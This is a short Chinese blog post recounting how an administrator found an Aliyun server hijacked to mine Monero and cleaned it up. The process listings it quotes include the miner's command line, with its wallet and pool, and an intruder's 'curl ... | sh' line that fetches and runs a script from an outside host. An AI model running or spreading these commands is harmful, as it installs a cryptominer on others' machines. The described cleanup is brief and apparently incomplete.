zoukankan      html  css  js  c++  java
  • 阿里云服务器被劫持成挖矿肉鸡的修复过程

    一台不太用阿里云服务器被运营报告连不上。putty登录查看发现全是一个叫yam的进程。

    上网查了一下,可能是被做成挖矿机了。

    先查看进程

    ps aux |grep yam

    结果如下

    root       670  0.9  1.8 188648 18456 ?        Sl   Nov22 212:41 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
    root       904  0.9  2.0 188648 20556 ?        Sl   Nov22 212:20 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
    root      1462  0.9  2.0 188648 20396 ?        Sl   Nov22 211:58 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
    root      1976  0.9  1.4 188648 14464 ?        Sl   Nov22 211:35 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
    root      2520  0.9  0.6 188648  6640 ?        Sl   Nov22 211:08 /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr
    ....

    先把进程杀掉

     killall -9 yam

    再查看所有进程

    ps aut

    root     28658  0.0  0.0   4064    76 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty1
    root     28659  0.0  0.0   4064    76 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty2
    root     28660  0.0  0.0   4064    72 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty3
    root     28661  0.0  0.0   4064    72 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty4
    root     28662  0.0  0.0   4064    76 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty5
    root     28808  0.0  0.0   4064    76 ?        Ss+  Nov23   0:00 /sbin/mingetty /dev/tty6
    root     29794  0.0  0.0 106092   148 ?        Ss   Nov21   0:00 /bin/sh -c curl -fsSL http://www.haveabitchin.com/pm.sh?1118 | sh
    root     29797  0.0  0.0 106096   156 ?        S    Nov21   0:00 sh
    root     29915  0.0  0.4 208564  4596 ?        Sl   Nov21   1:57 /tmp/duckduckgo
    

    发现这一段明显是劫持过程。

    然后把这些文件全部删除。

    完毕。

  • 相关阅读:
    【模板】线段树
    【模板】快速幂
    【模板】SPFA
    【模板】链式前向星
    C语言博客作业--函数嵌套调用
    C语言博客作业--结构体
    C博客作业--指针
    C语言博客作业--字符数组
    C语言博客作业--一二维数组
    C语言博客作业--函数
  • 原文地址:https://www.cnblogs.com/laomanong/p/6143902.html
Copyright © 2011-2022 走看看